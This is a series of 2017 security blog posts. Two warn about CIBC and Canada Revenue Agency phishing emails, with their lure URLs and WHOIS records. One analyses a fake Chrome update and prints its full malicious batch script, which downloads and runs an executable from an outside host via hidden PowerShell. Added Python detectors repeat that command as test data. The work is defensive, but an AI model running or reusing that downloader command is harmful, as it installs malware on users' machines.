Saturday, May 13, 2017

Phishing Email : CIBC Canada Confirmation - Summary of transaction

For the record, here's a recent "CIBC Canada Confirmation" phishing email that is circulating. It was caught by Junk or Spam filters here, but it may not be for you.

What to do?

Report them and label them as Phishing Email, not SPAM, in your online email system; see below.


Report them? 

Report Phishing URLs at Google Plex now as well;


Here's the view of the email in your online mail client:

The logo is stolen from this site:
http://www.stardale.org/youth/cibc_logo.jpg
 
Thank you for choosing CIBC.
 
You have an unclaimed incoming payment of $728.89 CAD ( Transaction ID: #SDKFNDdfdfdkDKJFDDF#)
We believe this may be a suspicious transaction and we have temporarily put a hold on your online access.

Please verify your online information to be able to claim your funds ($728.89 CAD).
Please click here to beging the verification process.

SPAM LINK TO : http://ww.netnsys.com/vqtsdqd/index.php

If your information is not verified within 24 hours the incoming transaction of $728.89 CAD will be rejected.




Here's what netnsys.com/vqtsdqd/index.php shows now: the page could not be found.
The domain is hosted in South Korea but owned by:

   This info is available for any site using a Whois lookup; https://www.godaddy.com/whois has one.


Domain Name: NETNSYS.COM
Registry Domain ID: Not Available From Registry
Registrar WHOIS Server: whois.doregi.com
Registrar URL: http://www.doregi.com 
Updated Date: 2010-03-03T21:30:11Z
Creation Date: 2000-03-08T15:48:35Z
Registrar Registration Expiration Date: 2019-03-08T15:52:55Z
Registrar: HANGANG SYSTEMS,INC. D/B/A DOREGI.COM
Registrar IANA ID: 87
Registrar Abuse Contact Email: doregi@doregi.com
Registrar Abuse Contact Phone: +82.7071631100
Reseller: 
Domain Status: ok https://icann.org/epp#ok 
Registry Registrant ID: Not Available From Registry
Registrant Name: Net & Sys Co., Ltd. 
Registrant Organization: Net & Sys Co., Ltd. 
Registrant Street: 300-2, 5th Floor, Doksan-Dong GeumCheon-Gu 
Registrant City: Seoul 
Registrant State/Province: 
Registrant Postal Code: 08584 
Registrant Country: KR
Registrant Phone: +82.226462202
Registrant Phone Ext:
Registrant Fax: +82.226467151
Registrant Fax Ext:
Registrant Email: peter.s.cho@gmail.com
Registry Admin ID: Not Available From Registry
Admin Name: Sanghoon Cho 
Admin Organization: Sanghoon Cho 
Admin Street: 300-2, 5th Floor, Doksan-Dong GeumCheon-Gu 
Admin City: Seoul 
Admin State/Province: 
Admin Postal Code: 08584 
Admin Country: KR
Admin Phone: +82.226462202
Admin Phone Ext:
Admin Fax: +82.226467151
Admin Fax Ext:
Admin Email: yoon@netnsys.com
Registry Tech ID: Not Available From Registry
Tech Name: Sanghoon Cho 
Tech Organization: Sanghoon Cho 
Tech Street: 300-2, 5th Floor, Doksan-Dong GeumCheon-Gu 
Tech City: Seoul 
Tech State/Province: 
Tech Postal Code: 08584 
Tech Country: KR
Tech Phone: +82.226462202
Tech Phone Ext:
Tech Fax: +82.226467151
Tech Fax Ext:
Tech Email: yoon@netnsys.com
Name Server: ns1.doregi.com
Name Server: ns2.doregi.com
Name Server: ns3.doregi.com
Name Server: 


How to tell this is a phishing email?


  1. Convert the email view from HTML to text and check for bad URLs.
  2. Hover over all links in the email; if the link target is not the same as the link text, forget it.
  3. The best way is to look at the message source, see below.


How to examine the email message source?


Now let's look at the message source:
  1. Outlook.com -> Actions -> View Message Source.
  2. Gmail.com -> More (down arrow at top right) -> Show original.
And look for phony links.


Report Phishing Email (not as Spam)


  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (down-arrow to top right)->Report Phishing 


Report phishing at Microsoft and government agencies


  1. https://www.microsoft.com/en-us/safety/online-privacy/phishing-symptoms.aspx

Friday, May 12, 2017

How to fix the Critical Chrome Update Virus Malware Attack

The Critical Chrome Update malware attack has been going around and getting through many antivirus solutions. Do not click the Download now button.



What does this do? A brief analysis

The Download now button downloads the following chrome_update.bat file:
  1. The script runs a PowerShell command that downloads a .dat file and saves it as a randomly named .exe file.
  2. It then runs this file in the background, which attempts to inject script into currently running processes.
  3. You are then shown an "Update complete" message box with an OK button.
  4. By clicking OK, you are installing install_flash.js, which contains VBScript.
wscript.exe is a Windows component (Windows Script Host) that executes VBScript files; in this case it runs install_flash.js.

chrome_update.bat contents
@echo off
echo a=new ActiveXObject('Wscript.Shell');
a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\16330788701ac441736751e3ee3c6996.exe';
(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);
Start-Process $d;
[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');
[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false);
>"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0"


Full analysis of this payload chrome_update.bat  at Payload Security.

More information about install_flash.js at Payload Security.
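Added example (not from the original post or from Payload Security): a small Python pass over constructed process-creation events that flags the chain analysed above, namely wscript.exe running a .js from %temp%, the hidden PowerShell DownloadFile, and an .exe started from %temp% underneath that script host. Event fields, PIDs and the C:\Users\u paths are constructed; real Sysmon or EDR schemas differ.

```python
"""Flag the chrome_update.bat chain (bat -> wscript.exe -> hidden PowerShell download -> Temp .exe)
in process-creation events. Added example; the event tuples below are constructed."""
import ntpath
import re

# Constructed events: (pid, ppid, image, command_line). Paths under C:\Users\u are invented.
EVENTS = [
    (100, 1, r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\Users\u\Downloads\chrome_update.bat"'),
    (101, 100, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\u\AppData\Local\Temp\install_flash.js"'),
    (102, 101, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"PowerShell -WindowStyle Hidden $d=$env:temp+'\16330788701ac441736751e3ee3c6996.exe';"
     r"(New-Object System.Net.WebClient).DownloadFile('https://eeteeinsightsoft.org/17/524.dat',$d);Start-Process $d"),
    (103, 102, r"C:\Users\u\AppData\Local\Temp\16330788701ac441736751e3ee3c6996.exe", r"16330788701ac441736751e3ee3c6996.exe"),
    (200, 1, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Scripts\inventory.js"'),  # benign: not run from Temp
]

TEMP_RE = re.compile(r"\\temp\\", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

def basename(path):
    return ntpath.basename(path).lower()

def ancestors(by_pid, pid):
    """Yield image basenames of a process's parents, nearest first."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid][1]
        if pid in by_pid:
            yield basename(by_pid[pid][2])

def detect(events):
    """Return (pid, rule) findings; rule names are constructed for this example."""
    by_pid = {e[0]: e for e in events}
    hits = []
    for pid, _ppid, image, cmd in events:
        img = basename(image)
        # Rule 1: a script host executing a script dropped into %temp% (wscript.exe install_flash.js)
        if img in SCRIPT_HOSTS and TEMP_RE.search(cmd) and SCRIPT_EXT_RE.search(cmd):
            hits.append((pid, "script_host_running_from_temp"))
        # Rule 2: hidden PowerShell window plus a WebClient download (the a.run("PowerShell ...") payload)
        if (img == "powershell.exe" and re.search(r"-w(indowstyle)?\s+hidden", cmd, re.I)
                and re.search(r"download(file|string)", cmd, re.I)):
            hits.append((pid, "hidden_powershell_download"))
        # Rule 3: an .exe launched from %temp% with a script host somewhere up the parent chain
        if TEMP_RE.search(image) and img.endswith(".exe") and SCRIPT_HOSTS & set(ancestors(by_pid, pid)):
            hits.append((pid, "temp_exe_spawned_under_script_host"))
    return hits
```

Run `detect(EVENTS)` to get one finding per stage of the chain; the benign wscript.exe event produces none.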


What to do if you did click the "Download Now" button?


  1. Run Bleeping Computer's Rkill. Do not reboot after. Then run Malwarebytes AdwCleaner. Reboot (you will be asked).
  2. Run Bleeping Computer's Rkill, then run Malwarebytes JRT in the same session.
  3. Run Malwarebytes.
  4. Run Hitman Pro.
  5. Run Windows Defender in Windows 8+, or Windows Security Essentials for Windows 7 or earlier.
  6. Run the free Kaspersky Security Scan (get it here).
  7. Run the free Kaspersky Anti-Ransomware Tool (get it here).
  8. Run your anti-virus solution in deep scan mode.
  9. Clear your Chrome cache:
     Open Chrome.
       1. On your browser toolbar, click More.
       2. Point to More tools, and then click Clear browsing data.
       3. In the "Clear browsing data" box, check only Cached images and files.
       4. Use the menu at the top to select the amount of data that you want to delete. Choose "the beginning of time" to delete everything.
       5. Click the Clear browsing data button.
  10. Review your cookies in Google Chrome.



Thursday, May 11, 2017

Phishing Email : CRA Applicant form return of $403.27 CAD

For the record, here's a recent Canada Revenue Agency (CRA) phishing email that is circulating. It was caught by Junk or Spam filters here, but it may not be for you.

What to do?

Report them and label them as Phishing Email, not SPAM, in your online email system; see below.


Report them? 

Report Phishing URLs at Google Plex now as well;


Here's the view of the email in your online mail client:

Dear Rob.Hamilton@outlook.com,

After the last annual calculation of your fiscal activity we have determined that you are eligible to receive a tax refund of 403.27 CAD

Please fill the secure tax return form and allow us 2-3 business days to process it
Secure form : http://cra-arg.gc.ca/tax-return/123467890/applicant

SPAM URL points to href="http://parkshilton.in/felrvnj/index.php"

Tax Return Number: GB232UUSZ21
Recipient e-mail: Rob.Hamilton@outlook.com



Here's what the http://parkshilton.in/felrvnj/index.php page looks like.

The domain is hosted in the USA but owned by:

   This info is available for any site using a Whois lookup; https://www.godaddy.com/whois has one.

Domain ID:D5779724-AFIN
Domain Name:PARKSHILTON.IN
Created On:31-Jan-2012 10:59:24 UTC
Last Updated On:02-Apr-2017 18:20:40 UTC
Expiration Date:31-Jan-2018 10:59:24 UTC
Sponsoring Registrar:Mitsu Inc (R158-AFIN)
Status:CLIENT TRANSFER PROHIBITED
Reason:
Registrant ID:BS_10305232
Registrant Name:S P Mohanty
Registrant Organization:SME Consulting Services
Registrant Street1:Fort
Registrant City:Mumbai
Registrant State/Province:Maharashtra
Registrant Postal Code:400001
Registrant Country:IN
Registrant Phone:+22.9320565526
Registrant Email:smeconsulting@live.com
Admin ID:BS_10305232
Admin Name:S P Mohanty
Admin Organization:SME Consulting Services
Admin Street1:Fort
Admin City:Mumbai
Admin State/Province:Maharashtra
Admin Postal Code:400001
Admin Country:IN
Admin Phone:+22.9320565526
Admin Email:smeconsulting@live.com
Tech ID:BS_10305232
Tech Name:S P Mohanty
Tech Organization:SME Consulting Services
Tech Street1:Fort
Tech City:Mumbai
Tech State/Province:Maharashtra
Tech Postal Code:400001
Tech Country:IN
Tech Phone:+22.9320565526
Tech Email:smeconsulting@live.com
Name Server:NS1.RHOSTJH.COM
Name Server:NS2.RHOSTJH.COM



CRA and the Canadian Anti-Fraud Centre


According to the Canada Revenue Agency (CRA), it's important to know that:
  • The CRA never requests, by email, personal information of any kind from a taxpayer.
  • The CRA will never request information from a taxpayer pertaining to a passport, health card, or driver's licence.
  • The CRA will not divulge taxpayer information to another person unless formal authorization is provided by the taxpayer.
  • The CRA will not leave any personal information on an answering machine.

More information about this scam is available on the Canada Revenue Agency's website. If you've been a victim, report it to your local police and to the Canadian Anti-Fraud Centre.

How to tell this is a phishing email?


  1. Convert the email view from HTML to text and check for bad URLs.
  2. Hover over all links in the email; if the link target is not the same as the link text, forget it.
  3. The best way is to look at the message source, see below.


How to examine the email message source?


Now let's look at the message source:
  1. Outlook.com -> Actions -> View Message Source.
  2. Gmail.com -> More (down arrow at top right) -> Show original.
And look for phony links.
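As an added example (not from the original post), here is a small Python check that does the "hover over links" and "look for phony links" steps automatically, for this post and for the identical steps in the CIBC post above: it pulls every link out of an HTML email body and flags those whose visible text names one host while the href points at another, which is exactly the CRA "Secure form" link shown above. The sample body is constructed to mirror that email, and the canada.ca link is a constructed benign control.

```python
"""Flag links in an HTML email whose visible text names one host while the href goes to another.
Added example, not from the original post; the sample body below is constructed to mirror the CRA email."""
from html.parser import HTMLParser
import re

# Constructed sample body: the visible "Secure form" URL claims gc.ca, the href goes to parkshilton.in.
SAMPLE_HTML = """
<p>Please fill the secure tax return form and allow us 2-3 business days to process it</p>
<p>Secure form : <a href="http://parkshilton.in/felrvnj/index.php">http://cra-arg.gc.ca/tax-return/123467890/applicant</a></p>
<p><a href="https://www.canada.ca/en/revenue-agency.html">Canada Revenue Agency</a></p>
<p><a href="http://parkshilton.in/felrvnj/index.php">click here</a></p>
"""

# Matches a bare hostname or URL (scheme optional) and captures the host part.
HOST_RE = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(?:[/:].*)?$", re.I)

class LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = []      # (href, visible text) pairs in document order
        self._href = None    # href of the <a> currently open, if any
        self._text = []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def host_of(url):
    """Lower-cased hostname of a URL or domain-looking string, else None."""
    m = HOST_RE.match(url.strip())
    return m.group(1).lower() if m else None

def find_phony_links(html):
    """Return (href, text) pairs where the text looks like a URL but names a different host than the href."""
    parser = LinkCollector()
    parser.feed(html)
    phony = []
    for href, text in parser.links:
        shown, real = host_of(text), host_of(href)
        if shown and real and shown != real:   # "click here" has no host, so only URL-like text is compared
            phony.append((href, text))
    return phony
```

Feed the output of "Show original" or "View Message Source" (the HTML part) into `find_phony_links` to get the mismatched links listed rather than hovering over each one.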


Report Phishing Email (not as Spam)


  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (down-arrow to top right)->Report Phishing 


Report phishing at Microsoft and government agencies


  1. https://www.microsoft.com/en-us/safety/online-privacy/phishing-symptoms.aspx